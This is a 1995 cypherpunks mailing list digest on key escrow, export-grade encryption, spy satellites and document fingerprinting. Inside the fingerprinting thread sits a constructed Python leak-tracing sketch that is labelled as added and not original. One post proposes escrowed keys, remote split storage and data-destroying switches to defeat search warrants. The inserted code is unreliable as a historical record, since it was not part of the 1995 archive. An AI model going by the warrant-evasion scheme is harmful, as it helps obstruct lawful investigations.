MIME-Version: 1.0
Content-Type: text/plain


   9-12-95. NYPaper:

   "Spy Satellites' Early Role As 'Floodlight' Coming Clear."

      Corona. Everything about it was beyond top secret -- its
      name and history, builders and operators, cameras and
      orbits, photographs and interpreters and, most important
      of all, what it snooped on from space. It was officially
      and assiduously treated for decades as if it did not
      exist. The 95 Corona satellites that successfully
      conducted espionage from 1960 to 1972 turn out to have
      been remarkably advanced tools whose development, far
      from the work of an inner circle, drew on the nation's
      top scientific and industrial talent. More important,
      the new disclosures show just how greatly the craft
      revolutionized Washington's ability to understand its
      cold war friends and enemies.

      Sergei Khrushchev, son of the Soviet leader Nikita S.
      Khrushchev, told the Itek conference that one Corona
      film pod dropped into a Russian forest, where
      ax-wielding woodsmen chopped it up. Another spy
      satellite misdirected its film pod into a field in
      central Asia, where peasants wrapped the precious Kodak
      film around poles to provide solitude for a privy.


   NRO_puf  (16 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 08:05:01 PDT
To: cypherpunks@toad.com
Subject: VOO_doo
Message-ID: <199509121504.LAA09688@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-12-95. NYPaper:


   "Bulletin Board Is Virtual; Hacker Arrests Are Real."

      It was a classic sting operation, the kind of undercover
      gambit that has nabbed bad guys for decades. But the
      meeting place for this subterfuge was not some grimy
      storefront. It was a computer bulletin board that the
      United States Secret Service had rigged together to
      troll for people who are illegally trafficking in the
      codes that program cellular phones.


   " 'Innocent' Files Can Carry a Virus."

      A new kind of computer virus has descended upon the
      world. How easy is it to create one? Fifteen minutes
      after opening a Microsoft Word reference manual, I had
      cranked out a one-line program that could eliminate
      crucial system files from a hard drive. By bedtime I had
      figured out how to get this file to transmogrify Word
      itself so it would embed my trick program in any
      document it opened. In an evening, I had created a virus
      of my very own. This is scary stuff. Scarier still is
      that if I can do it, millions of others can too.
      Henceforth virtually every document on the information
      highway must be considered suspect. 


   2: VOO_doo












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Tue, 12 Sep 95 10:27:17 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <v01510100ac7a4e673a66@[193.74.217.13]>
Message-ID: <199509121726.LAA27609@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >intercepts requested and authorized in the past year.  As I recall, the
> >number was quite small - around 12K [?].  Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
> 
> I think it's about 1200.
> 
> >not a large number, anyway.  I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
> 
> A more cautious conclusion would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest.  You could interpret that a lot of ways:  I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

It could also be argued that the number of busts and wire taps will go up 
dramatically as more and more people begin to use communications in more 
integrated ways with their life and career.  It is kind of a fallacy, but
communications does seem to be a rapidly growing market.  I imagine the folks
who push for that sort of crap are thinking of the future, else we'd already 
have it.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Sep 95 09:29:17 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Digital Fingerprinting
Message-ID: <9509121627.AA00538@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  I said I'd mention "state secrets" again. The usual example for
>  making subtle modifications to documents to see who leaked it is
>  the intelligence community, which gave us the term "barium" (because
>  the changes look like barium in an x-ray diagnostic).

Such technology would be very useful in business, especially the high-tech  
industry.  Think of how many non-disclosure agreements are signed every day  
relating to new products developed for the software industry alone.  Many  
companies are very paranoid and already 'fingerprint' information by using  
unique code-names for projects, for instance.  i.e. the spec sheet on their  
new GAK crypto product they give to Alice may be code-named 'project foobar'  
but the one they give to Bob may be code-named 'project burris'...  Then,  
when the information leaks out they check which person they gave the document  
with that code-name and they know who to sue (or at least not give any more  
trade-secrets to).  It's very simplistic but it has been known to work in the
past.

Most of the real technology for doing this is much better, of course...   
However, what stops you from printing out a fingerprinted document and  
scanning it back in, for instance?


andrew
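
Added example (not part of the original message, and not code from any
product it mentions): a Python sketch of the code-name fingerprint described
above, extended with per-recipient word choices so that a copy that has been
printed and rescanned, or had its code name edited out, can still be traced.
The document text, the third code name, the recipient codewords and all
function names are constructed for illustration.

```python
import re

# Constructed sample document. Each numbered slot has two interchangeable
# wordings; which one a recipient sees encodes one bit of their codeword.
TEMPLATE = (
    "Project {codename} {0} a tamper-resistant key store. "
    "Pilot production {1} in March, with {2} 500 units {3} to partners. "
    "Partners must {4} the escrow agent {5} launch. "
    "We expect {6} orders and will {7} resellers with training."
)
SLOTS = [
    ("uses", "employs"), ("begins", "starts"),
    ("roughly", "approximately"), ("shipped", "delivered"),
    ("notify", "inform"), ("before", "ahead of"),
    ("large", "sizeable"), ("assist", "support"),
]
# Code name plus an 8-bit codeword per recipient (constructed values).
# The codewords differ pairwise in 4 positions, so one misread slot
# cannot turn one recipient's copy into another's.
RECIPIENTS = {
    "alice": ("foobar", "00001111"),
    "bob": ("burris", "00110011"),
    "carol": ("quince", "01010101"),
}

def issue_copy(name):
    """Render the copy handed to one recipient."""
    codename, bits = RECIPIENTS[name]
    words = [SLOTS[i][int(b)] for i, b in enumerate(bits)]
    return TEMPLATE.format(*words, codename=codename)

def normalize(text):
    """Drop case, punctuation and layout: roughly what survives retyping or OCR."""
    return " ".join(re.findall(r"[a-z0-9]+", text.lower()))

def by_codename(leak):
    """The simple scheme from the message: look for a unique code name."""
    text = f" {normalize(leak)} "
    hits = [n for n, (code, _) in RECIPIENTS.items() if f" {code} " in text]
    return hits[0] if len(hits) == 1 else None

def read_slots(leak):
    """Return '0', '1' or None (missing or ambiguous) for every slot."""
    text = f" {normalize(leak)} "
    observed = []
    for zero, one in SLOTS:
        has0 = f" {normalize(zero)} " in text
        has1 = f" {normalize(one)} " in text
        observed.append("0" if has0 and not has1 else "1" if has1 and not has0 else None)
    return observed

def attribute(leak):
    """Return (closest recipients, their mismatch count, number of slots read)."""
    observed = read_slots(leak)
    seen = sum(o is not None for o in observed)
    scores = {
        name: sum(o is not None and o != b for o, b in zip(observed, bits))
        for name, (_, bits) in RECIPIENTS.items()
    }
    best = min(scores.values())
    return sorted(n for n, s in scores.items() if s == best), best, seen

def simulate_rescan(copy, codename):
    """Constructed stand-in for print-and-scan: code name blanked out,
    case changed and lines re-wrapped."""
    words = copy.replace(codename, "[redacted]").upper().split()
    return "\n".join(" ".join(words[i:i + 6]) for i in range(0, len(words), 6))

if __name__ == "__main__":
    leak = simulate_rescan(issue_copy("bob"), "burris")
    print(leak)
    print("by code name :", by_codename(leak))
    print("by word usage:", attribute(leak))
    # A one-sentence excerpt carries a single slot and narrows nothing.
    excerpt = issue_copy("bob").split(". ")[0].replace("burris", "X")
    print("excerpt      :", attribute(excerpt))
```
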




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 12 Sep 95 08:34:30 PDT
To: cypherpunks@toad.com
Subject: Netscape to patch shareware version
Message-ID: <Pine.BSD/.3.91.950912111322.20533B-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain


This is from the Sept 11, 1995 Inter@ctive Week:

Netscape Communications Corp.'s freely distributed browser is getting 
commercial-grade encryption, making it safe to use in the U.S.  The 
change comes two weeks after Inter@ctive Week disclosed that the free 
version contained relatively weak encryption that had been cracked by a
European user.

[...]

Meanwhile, in an as yet unannounced move, the company said it would place
its commercial browser online for free downloading.  That move apparently
comes in direct response to an Inter@ctive Week article that highlighted
the fact that all shareware versions of the browser contain the so-called
40-bit key encryption software which was recently proven insecure.  The
commercial version, sold only in the U.S. contains an unbreakable 128-bit 
encryption scheme.

Netscape said it received word last week that the State Department had 
cleared that version for release on the Net, but only within the U.S., 
owing to current export laws banning the export of encryption schemes 
stronger than 40 bits.  The company could provide no details by press
time on how it would ensure that the 128-bit version wouldn't leak beyond 
U.S. borders.

[end excerpts]

I love how Inter@ctive Week pats themselves on the back for making people 
aware of the problem. I guess the cypherpunk media hacking is working.  
Doing things behind the scenes and making the press think they are the 
internet users' salvation looks like a good tactic.

The cypherpunks forced a situation where Net users now have better 
encryption available to them.  I'd say this is a big win.

      Weld Pond   -  weld@l0pht.com   -   http://www.l0pht.com/~weld
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Tue, 12 Sep 95 09:48:44 PDT
To: talon57@well.com (Brian D Williams)
Subject: Re: Elliptic Curve Public Key Crypto
In-Reply-To: <199509121620.JAA08381@well.com>
Message-ID: <3055b9ac3c42002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Brian D Williams said:
> 
>  Now could someone remind me where the Cypherpunks FTP site is?
> 

ftp://ftp.csua.berkeley.edu/pub/cypherpunks

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 12 Sep 95 10:03:01 PDT
To: Mike Rosing <cryptech@Mars.mcs.com>
Subject: Re: Elliptic Curve Public Key Crypto available
Message-ID: <9509121658.AA00550@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Previous to the availability of 100 MHz processors this method of
>  public key crypto was ridiculously slow.  The only versions were
>  laboratory curiosities implemented in ASIC hardware.  Code, if it
>  exists, is not in the public domain.

What about NeXT's Fast Elliptic Encryption (FEE)?  Their research guy,  
Richard Crandall, came up with major speedups to elliptic curve encryption.   
In fact, there was a simple cryptosystem that shipped as a demo with NeXTSTEP  
2.0.  What was most interesting about this system was that it didn't store  
any keys anywhere;  your public/private key pair was generated _on the fly_  
from your passphrase every time you encrypted or decrypted....on a 25mhz  
68040 too...   and it was fast!  It wasn't that great of an implementation  
(you _really_ need a lot of bits of entropy in that passphrase, and you can't  
change your passphrase without changing your PK), but it shows how fast  
NeXT's speedups are.  And this was in 1990...

I'm not sure if the speedups are patented, but you could try a literature  
search.  If it really is fast then it could mean good things for servers that  
need to do a lot of encryption/decryption for interaction with clients.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: keelings@wu1.wl.aecl.ca (S. Keeling)
Date: Tue, 12 Sep 95 13:17:31 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and
Message-ID: <9509121731.AA10786@wu1.wl.aecl.ca>
MIME-Version: 1.0
Content-Type: text/plain


Incoming from Henry W. Farkas:
> 
[snip]
> When the safety is finally removed from the gun at your head (sorry for
> the drama) you hand over your alternate secret key.  If decrypted with the
> "alternate" or "fake" secret key, the encrypted file is wiped until it
> reaches a marker; the remainder of the file is displayed.  If you use your
> "primary" or "real key", the extraneous text is simply stripped. 

	I would just like to point out that, when a LEA comes to you
to get at the contents of your computer, (s)he is not going to
patiently wait while your system wipes the offending evidence off your
hard disk.  The first thing they do is make a copy of everything, so
they can work from the copy.  Besides, you do have backup tapes laying
around all over the place, don't you?

-- 

 "Remember, obsolescence (Win95) isn't an accident;  it's an art form!" 
   keelings@wu1.wl.aecl.ca       s. keeling,   aecl - whiteshell labs



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 12 Sep 95 12:44:31 PDT
To: talon57@well.com (Brian D Williams)
Subject: Re: Elliptic Curve Public Key Crypto
In-Reply-To: <199509121620.JAA08381@well.com>
Message-ID: <199509121939.MAA25838@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	ftp.csua.berkeley.edu


> 
> 
> 
> Mike Rosing writes:
> 
> >in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii
> >files. One contains code and the other contains documentation:
> >eliptic.src and elliptic.doc.  The code portion is a cat'ed block
> >of files: headers, C sources and a set of prime numbers.  The
> >documentation attempts to explain the math, but it does help if
> >you already know number theory.  It hopefully isn't necessary.
>  
>  Thanks Mike for all your effort!!
> 
>  Now could someone remind me where the Cypherpunks FTP site is?
> 
>  Please?
> 
> Brian D Williams
> Cypherpatriot
> 
>  " Zen? Well it beats sitting around on your ass all day doing
>    nothing! "
> 


-- 
sameer						Voice:   510-601-9777
Network Administrator				FAX:	 510-601-9734
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Tue, 12 Sep 95 12:49:59 PDT
To: Weld Pond <weld@l0pht.com>
Subject: Re: Netscape to patch shareware version
In-Reply-To: <Pine.BSD/.3.91.950912111322.20533B-100000@l0pht.com>
Message-ID: <199509121948.MAA03663@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



| Meanwhile, in an as yet unannounced move, the company said it would place
| its commercial browser online for free downloading. [..] The commercial
| version, sold only in the U.S. contains an unbreakable 128-bit
| encryption scheme. 

Hurray! We did it! We did it! :-)

| Netscape said it received word last week that the State Department had 
| cleared that version for release on the Net, but only within the U.S., 
| owing to current export laws banning the export of encryption schemes 
| stronger than 40 bits.  The company could provide no details by press
| time on how it would ensure that the 128-bit version wouldn't leak beyond 
| U.S. borders.

Ok, any bet on how long it will take?

| The cypherpunks forced a situation where Net users now have better 
| encryption available to them.  I'd say this is a big win.

The power of the Net is actually quite astonishing at times. The
plotting in Ender's Game isn't all that unrealistic after all. (Oh,
well, ruler of the world is a bit of still. ;-))

/Christian





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Tue, 12 Sep 95 09:57:03 PDT
To: cypherpunks@toad.com
Subject: Famous Zen koan: what is the sound of two shoes dropping?
Message-ID: <9509121656.AA18132@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


You may recall that Dorothy Denning had a pro-Clipper article in
_Technology Review_ back in July.  The October issue of TR contains
not only some critical letters to the editor, but also a reply from
Denning.  How things have changed over the last 18 months...

					--bal

------- Start of forwarded message -------
Date: Tue, 12 Sep 95 12:23:00 -0400
Return-Path: <hal@martigny.ai.mit.edu>
From: Hal Abelson <hal@martigny.ai.mit.edu>
To: bal@martigny.ai.mit.edu
Subject: Famous Zen koan: what is the sound of two shoes dropping?

What is the sound of two shoes dropping?

**Part 1:  March 10, 1994

(From the debate between Dorothy Denning and John Perry Barlow,
moderated by Philip Elmer-DeWitt)

Barlow: EFF is not asking the Government to drop Clipper, though we
would vastly prefer they did. We're merely asking that no steps be
taken to require it either by law or practice...as, for example, would
be the case if you had to use a Clipper chip to file your tax return.

DeWitt: Dr. Denning, do you think this is the "first step in a
process to outlaw crypto"?

Denning: No I do not.

***Part 2: October 10, 1995

(From Dorothy Denning's response to letters to the editor in
_Technology Review_)

Denning:  But critics make an important point when they argue that
criminals will not use Clipper or other forms of key escrow
encryption.  As long as there are no laws in the United States
controlling the sale and distribution of encryption products, the
U.S. market will be flooded with products that have no provisions for
government access.  This eventual threat to public safety and social
order could be avoided by establishing a licensing program for
encryption products that reasonably satisfy the government's
decryption requirements and do not interoperate with unlicensed
systems.  While the manufacture and distribution of unlicensed
encryption products would be illegal, no particular system would be
mandatory and any licensed product could be used without restriction.
Although such a licensing program would not prevent criminals from
using unlicensed products, their availability would be limited to
underground channels.

------- End of forwarded message -------

P.S. Denning's TR article is available at:

http://web.mit.edu/afs/athena/org/t/techreview/www/articles/july95/Denning.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Tue, 12 Sep 95 13:01:10 PDT
To: dccp@eff.org
Subject: DC-C'punks meeting
Message-ID: <199509121958.MAA01005@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to waste list bandwidth for the 600 folks too far
away to care about this...

The next DC-area c'punks meeting will be September 16, it will be 
at the Digex headquarters offices in Beltsville, probably 
starting about 3:00 PM. 

Digital Express Group
6800 Virginia Manor Road
Beltsville Maryland 20705
(301) 847-5000 

Directions to DIGEX

From the Washington Beltway (I495) in Maryland, take Route 1 North.
Drive on Route 1 a few miles, maybe as many as three or four.
You will see a Ritz Camera Center. Turn left onto Ritz Way.
At the second street, turn Right onto Virginia Manor Road.
You are now near 6800 Virginia Manor Road.
Digex is the last building on the Right. 

If you need more information, email me, or see my
http://www.isse.gmu.edu/~pfarrell/dccp page.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A5113643667@attpls.net (Tom Jones)
Date: Tue, 12 Sep 95 06:06:14 PDT
To: peace@acm.org (Tom Jones)
Subject: No Subject
Message-ID: <D71D5F23>
MIME-Version: 1.0
Content-Type: text/plain


Dear Cypherpunks and Tom,

The ones I've heard about are SKIP, Photuris and ISAKMP(sp?).

Peace


----------------
Received: by attpls.net with Magicmail;12 Sep 95 10:34:32 UT
Date: 12 Sep 95 13:05:43 UT
Sender: owner-cypherpunks@toad.com (owner-cypherpunks)
From: owner-cypherpunks@toad.com (owner-cypherpunks)
Subject: Re: draft key mgmt props
To: peace@acm.org (Tom Jones)
cc: cypherpunks@toad.com (Cypherpunks)
Message-Id: <199509121024.GAA15929@frankenstein.piermont.com>
In-Reply-To: <Your message of "Tue, 12 Sep 1995 07:15:16 -0000."
 <3E79EDD0>>
Reply-To: perry@piermont.com (perry)
X-X-AUTHENTICATION-WARNING: frankenstein.piermont.com: Host localhost
 didn't use HELO protocol
X-X-REPOSTING-POLICY: redistribute only with permission


Tom Jones writes:
> Does anyone here feel like explaining the situation between the three
> key management proposals now at the internet draft stage?

Which ones are you referring to?

.pm

----------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@coyote.csusm.edu>
Date: Tue, 12 Sep 95 13:50:40 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Netscape to patch shareware version
Message-ID: <v03003201ac7ba018fb3e@[199.254.15.58]>
MIME-Version: 1.0
Content-Type: text/plain


>| Meanwhile, in an as yet unannounced move, the company said it would place
>| its commercial browser online for free downloading. [..] The commercial
>| version, sold only in the U.S. contains an unbreakable 128-bit
>| encryption scheme.
>
>Hurray! We did it! We did it! :-)

Indeed. Congratulations to Damien, Adam, and all the other people who
contributed cycles to the "Cypherpunks Key Breaking Ring".

>
>| Netscape said it received word last week that the State Department had
>| cleared that version for release on the Net, but only within the U.S.,
>| owing to current export laws banning the export of encryption schemes
>| stronger than 40 bits.  The company could provide no details by press
>| time on how it would ensure that the 128-bit version wouldn't leak beyond
>| U.S. borders.
>
    I suspect Netscape will do the minimum so that they will not be held liable.

>Ok, any bet on how long it will take?
>
    Less than 3 hours.

>| The cypherpunks forced a situation where Net users now have better
>| encryption available to them.  I'd say this is a big win.
>
>The power of the Net is actually quite astonishing at times. The
>plotting in Ender's Game isn't all that unrealistic after all. (Oh,
>well, ruler of the world is a bit of still. ;-))
>
Demosthenes






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Tue, 12 Sep 95 10:45:36 PDT
To: cypherpunks@toad.com
Subject: Re: Digital Fingerprinting
Message-ID: <9509121745.AA19687@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Finding the mail mixed in there is evidence that supports the "charge" 
> but surely can be rebutted.  When I was practicing in a small town c. 
> 1984, people would be summoned (sent a paper telling them to show up) to 
> court for illegal dumping if their mail was found with other trash, old 
> refrigerators, etc., in a creek somewhere.  Those charged could always 
> put on proof that Billy Bob's garbage service picked up their trash ...

> The sentence was almost always to go and pick up some multiple of the 
> garbage found and take it to the landfill.

This was Stockbridge, in MA, right :-?

	        That's what we did, and drove back to the church, had a
	thanksgiving dinner that couldn't be beat, went to sleep and didn't
	get up until the next morning, when we got a phone call from officer
	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
	half a ton of garbage, and just wanted to know if you had any
	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
	lie, I put that envelope under that garbage."
(c) Arlo Guthrie


 

Peter Trei
Senior Software Engineer
Purveyor Development Team                                
Process Software Corporation
http://www.process.com
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 12 Sep 95 10:54:49 PDT
To: cypherpunks@toad.com
Subject: Payment Systems
Message-ID: <v02120d01ac7b76984c67@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: "John Hemming CEO MarketNet"  <JohnHemming@mkn.co.uk>
Date:  Tue, 12 Sep 1995 15:38:00 PM PDT
To: www-buyinfo@allegra.att.com
Mime-Version: 1.0
Subject: Payment Systems

For the edification of those concerned we have issued our first
Electronic Cheque today.

The browser now has been tested linking signed instructions
directly to the web.  The browser, however, is still being developed
to resolve the problems with shortage of space in Windoze DGROUP.

There is a copy of the browser at
ftp://193.119.26.70/mktnet/pub/echeque.zip  (or something
similar) we would recommend waiting a while before you take it
however and to take the horse.zip as well because of the DGROUP
issue).

The only form that will accept Echeques at the moment is
http://193.118.187.107/load ordflow

The trick in this form (if you are using our browser) is that it allows
payment either by ECheque or by credit card and only generates the
signed instruction for echeques.  The signed instruction is then
sent to our servers encrypted with 128 bit RC4.

ttfn
John

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: kelso@netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 14:17:31 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology tries to break PGP - and (fwd)
Message-ID: <199509122056.NAA19963@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 	I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk.  The first thing they do is make a copy of everything, so
> they can work from the copy.  Besides, you do have backup tapes laying
> around all over the place, don't you?
 
Sounds like a recommendation for SFS (Secure File System).
It encrypts everything going to the disk.
I used an SFS partition for a while.  But, I swap between
DOS and Linux.  Haven't seen SFS for Linux yet.
 
Later,
Tom <kelso@netcom.com>
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Philipp <adam@rosa.com>
Date: Tue, 12 Sep 95 14:00:54 PDT
To: John Young <cypherpunks@toad.com
Subject: VOO_doo
Message-ID: <m0sscWB-000HLCC@powergrid.electriciti.com>
MIME-Version: 1.0
Content-Type: text/plain



--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|    http://www.rosa.com/~adam    |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA: Confidential,          |communications are preferred for   | 
|secret, not for publication.     |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Sep 95 14:07:02 PDT
To: cypherpunks@toad.com
Subject: Key Escrow as Law Enforcement's *Worst Nightmare*
Message-ID: <ac7b412911021004bdd2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



"Be careful what you ask for--you might get it." (Albanian Proverb)

I'll summarize my post with my last line: In short, key escrow could be law
enforcement's worst nightmare, as it truly opens up the Web as a worldwide,
distributed file system.

At 6:31 PM 9/12/95, S. Keeling wrote:

>        I would just like to point out that, when a LEA comes to you
>to get at the contents of your computer, (s)he is not going to
>patiently wait while your system wipes the offending evidence off your
>hard disk.  The first thing they do is make a copy of everything, so
>they can work from the copy.  Besides, you do have backup tapes laying
>around all over the place, don't you?

This is a main reason why "key escrow" is a double-edged sword for Law
Enforcement. That is, it is not an unadulterated "win" for them.

Consider the easy availability of a "key escrow" system (I'm deliberately
avoiding calling it either SKE, or CKE, or GAK) in which files may be
locally encrypted with the files, local decryption software, etc., stored
locally--but with efficient fast-erase methods (ranging from the
oft-mentioned "thermite charge" to a more user-friendly overvoltage to fry
the motherboard (for example, just to make the point).

(My point is not to speculate on what a "dead man switch" might look like,
but merely to look at the implications of widespread key escrow and data
destruction tools.)

Key escrow, with the keys deposited safely with one's "Family" (in both
senses of the term), and/or with one's lawyer, and/or in offshore
locations) could make the use of dead man switches much "safer." A numbers
game operator can rest easy in flushing his computer, knowing key escrow
and remote storage exists.

"Remote storage"? Sure, the Web offers easy and transparent ways to split
files up and store them in various locales. Kind of makes "search warrants"
a problem, doesn't it? The promise of the Web, to many of us, is that URLs
essentially make the machines accessible via the Web into a kind of huge,
distributed file system.

Remote sites can already be used for storage, obviously. The Web offers a
new degree of automation of the process, with many interesting
possibilities.

An interesting project would be to build tools similar to ftp for automatic
backup of files to remote locations, perhaps locations that accept
"deposits" for a fee. (In digital money tokens, even.)

The tool could do multi-part splitting, and could encrypt the files. Keys
(and the locations of the parts) could independently exploit the kind of
"key escrow" mentioned above.

So, a raid is made on a site. The files are not found there, as they have
been automatically filed on other sites, with the key/location info
escrowed with escrow agents who are not cooperative with search warrants,
subpoenas, etc.

(It may be sufficient for a person to "remember" the N sites, as the sites
may be uncooperative enough so as to make it impossible for the law
enforcement people to "demand" access to files. I can discuss this further.
While not "secure" in a strong crypto sense, in practice this will be
pretty effective--after all, the pieces are similar to offshore bank
account access info, and law enforcement is pretty much powerless to get N
countries/banks to cooperate on a blanket search.)

In short, key escrow could be law enforcement's worst nightmare, as it
truly opens up the Web as a worldwide, distributed file system.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Tue, 12 Sep 95 11:19:50 PDT
To: cypherpunks@toad.com
Subject: NIST conference summary in CDT
Message-ID: <Pine.ULT.3.91.950912141544.12986A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain



The Center for Democracy in Technology policy posting no. 24 provides a
pretty good summary of the NIST conference.  If anyone is interested,
e-mail me privately and I can forward it to you. 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@rand.org>
Date: Tue, 12 Sep 95 14:53:28 PDT
To: cypherpunks@toad.com
Subject: Friday (15 Sep) GAK meeting at NIST
Message-ID: <199509122153.OAA02242@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



I was hoping to attend and enturbulate, but my schedule doesn't quite wrap
around it.  Here's the schedule and talking paper they sent when I inquired.

	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 21:48

----------------------------------------------------------------------------

                    WORKSHOP TENTATIVE AGENDA
             Developing Federal Key Escrow Standards

                       September 15, 1995
                          Hilton Hotel
                     Gaithersburg, Maryland
                                
9:00      Welcome, Agenda Overview
          Miles Smid, NIST

Goals and Objectives

9:10      Discussion of Goals and Objectives
          Ray Kammer, Deputy Director, NIST

9:20      Initial Thoughts on Standards Development
          Miles Smid, NIST

9:30      Industry Perspectives (5-10 min max.)

          Note:  We still have a few slots of 5 min. available. 
          Please let Arlene Carlton (301-975-3240) know if you
          would like to make a formal presentation.
          
10:30     Break

10:45     Discussion

Technical Considerations

11:00     Identifying Technical Issues
          Miles Smid, NIST

11:15     Discussion

12:00     Lunch

1:30      Breakout sessions

3:15      Break

3:30      Breakout session reports

4:15      Discussion

4:30      Future Activities (Miles Smid, NIST)

5:00      Close                                        

Note:  The workshop will be held September 15, 1995 (9:00 a.m. -
5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.  The meeting will be open to the public,
although seating is limited.  Advance registration is requested,
please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail: carlton@micf.nist.gov.  (9/6/95)

                      ---------------------

